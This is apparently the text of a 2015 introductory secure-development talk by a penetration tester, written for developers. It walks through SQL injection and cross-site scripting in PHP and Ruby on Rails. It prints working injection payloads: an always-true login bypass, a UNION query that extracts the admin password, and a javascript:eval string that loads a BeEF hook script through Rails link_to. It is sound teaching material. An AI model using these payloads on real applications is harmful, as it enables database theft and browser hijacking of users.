don't do what derpy the dreadful dev does

Don’t Do what Derpy The Dreadful Dev Does (also - don’t let “friends” on IRC decide on your talk title) Secure Development Melbourne, 11/06/2015

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Don’t Do what Derpy The Dreadful Dev Does

(also - don’t let “friends” on IRC decide on your talk title)

Secure Development Melbourne, 11/06/2015


• @liamosaur

• Penetration Tester / Consultant with Assurance

• Previously: C# / Java developer

The Brief• Basic, Introductory Level talk

about security

• Establish some common ground between the Infosec and Dev world


• Popular vulnerabilities (hopefully a recap)

• Demo some tools by exploiting some vulns

OWASP Top 5/10

1. Injection (SQLi, Command injection, XXE, LDAPi etc)

2. Broken Auth / Session Management

3. Cross-Site Scripting (XSS)

4. Insecure Direct Object References

5. Security Misconfiguration

SQLi basics

• Inject user controlled content into dynamic SQL queries, allowing unintended access/control of database

SQLi basics• PHP: $query = "SELECT username FROM users WHERE username=‘".$_POST['username']."'";

• Input: liamo

• SQL: SELECT username FROM users WHERE username=‘liamo’

• Query result: liamo

SQLi basics• PHP: $query = "SELECT username FROM users WHERE username=‘".$_POST['username']."'";

• Input: ' OR 'a'='a

• SQL: SELECT username FROM users WHERE username=‘' OR ‘a'='a’

• Query result: list of all users

SQLi basics• PHP: $query = "SELECT username FROM users WHERE username=‘".$_POST['username']."'";

• Input: liamo' UNION SELECT password FROM users WHERE username='admin

• SQL: SELECT username FROM users WHERE username=‘liamo' UNION SELECT password FROM users WHERE username='admin’

• Query result: liamo and the admin password

Cross-Site Scripting (XSS)

• Inject user controlled content into dynamic web content, allowing unintended access/control within a target browser

XSS Basics• HTML: <html><body>Hello, <?php echo $_REQUEST ['name']; ?>!</body></html>

• Input: Liam

• Output: Hello, Liam!

XSS Basics• HTML: <html><body>Hello, <?php echo $_REQUEST ['name']; ?>!</body></html>

• Input: Liam<script>alert(1)</script>

• Output:

XSS - Who cares?• Old school - cookie stealing •


• Steal session ID - game over

• Less effective thanks to httpOnly cookie flag

“Nobody uses PHP anymore Liam, all the cool kids use Ruby on Rails


PHP Demo!


• Problem #1 - I don’t know Rails

• Solution: Learn Rails! (this is definitely a worthwhile proposition for a “10-20 minute talk”)

Rails• Learned Rails. Wrote a basic app

• Problem #2: Rails has ActiveRecord magic beans that prevent SQLi


• Solution: Uhh.. maybe I’ll just demo XSS instead!

Rails• Problem #3: Rails has input/

output escaping magic beans that prevent XSS

• Solution: Declare webapp security solved, retire from pentesting, write Rails app, move to SF, get VC, found startup, sell to Google/Apple, make fat stacks, retire

Rubby Demo!

Presenting: Rubby

Presenting: Rubby• Bad code

• Better code

Exploiting Rubby

Rubby XSS

• “link_to” is vulnerable to XSS out of the box if it displays user controlled content

Rubby XSS• Challenge for those playing at home:

some up with a shorter, more elegant way of injecting a link to hook.js into a Rails link_to than this monstrosity: javascript:eval("function x(){var a = document.createElement('script');a.setAttribute('src','');document.head.appendChild(a);};x();");

BeEF Tunnelling ProxyBeEF SERVER

(http proxy)

Phish with XSS hook.js

Attackers Browser

Victims Browser

(XHR proxy)

Target server (same domain as

XSS phish)

Frameworks/Languages• PHP

• Bad: No built in security

• Ruby on Rails

• Good: Built in security

Frameworks/Languages• PHP

• Good: PHP devs know they need to take security into account

• Ruby on Rails

• Bad: “The framework takes care of security for me!”

Conclusions• Security is everyone’s


• Your frameworks magic beans won’t save you

Questions - save for the Q&A Panel!





